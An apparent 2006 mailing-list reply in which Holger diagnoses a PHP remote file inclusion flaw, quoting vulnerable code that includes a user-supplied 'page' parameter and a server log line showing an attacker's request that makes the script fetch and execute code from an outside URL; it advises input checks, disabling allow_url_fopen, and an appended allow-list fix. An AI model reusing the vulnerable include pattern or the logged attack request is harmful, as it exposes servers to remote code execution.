Hi,
> at that mentioned time someone at least tried to access pages which are
> not accessible (index.php?img=1 e.g.)
>
> there definitely might be a problem in the code:
>
> if ( $_GET['page'] ) {
> include $_GET['page'].'/index.php';
> }
>
>
> could this be the vulnerable code segment?
Looks like that's the one. Have a look at the following line in your log file:
82.103.132.227 - - [29/Oct/2006:20:12:34 +0100] "GET /index.php?page=http://www.excelsiorgroningen.nl/www/.admin/readname.txt? HTTP/1.1" 200 39094 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7"
Your script then includes and executes the script from the URL.
How to avoid? First, follow RULE ONE (TM): Always do sanity checks on
user-supplied input.
The impact could have been avoided by setting allow_url_fopen to 0 in your
php.ini. (Unless one of your scripts really, really needs this - but think
twice before using it!)
But IMHO your approach to include files with dynamically generated paths is
not a good idea anyway. Consider a different solution like redirecting the
browser to the resulting URL. This won't prevent the attack from being
successful, but it won't affect your server.
Best regards,
Holger
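
Added example, not part of the message above or of the original poster's code: one way to apply the sanity check on the page parameter is to accept it only when it exactly matches a fixed allow-list, so the request value never builds a path on its own. The page names, the function name resolve_page and the use of PHP 7.1+ syntax are assumptions.

```php
<?php
// Replaces:  include $_GET['page'].'/index.php';
// Hypothetical page names; list the directories the site really has.
const ALLOWED_PAGES = ['home', 'news', 'gallery', 'contact'];

/**
 * Map the user-supplied ?page= value to a file on disk, or return null.
 * The value is only compared against the allow-list; it reaches a path
 * only after an exact match.
 */
function resolve_page($requested, string $baseDir): ?string
{
    // Reject arrays (?page[]=x) and any other non-string input.
    if (!is_string($requested)) {
        return null;
    }
    // Strict comparison: URLs, "../" sequences and NUL-suffixed names fail here.
    if (!in_array($requested, ALLOWED_PAGES, true)) {
        return null;
    }
    // Defence in depth: the resolved file must exist below $baseDir.
    $base = realpath($baseDir);
    $real = realpath($baseDir . '/' . $requested . '/index.php');
    if ($base === false || $real === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

// Default to the (hypothetical) 'home' page when no parameter is given.
$file = resolve_page($_GET['page'] ?? 'home', __DIR__);
if ($file === null) {
    http_response_code(404);
    exit('Page not found');
}
include $file;
```

With this in place the request shown in the log line above gets a 404, because the URL is not one of the allowed names and is never passed to include.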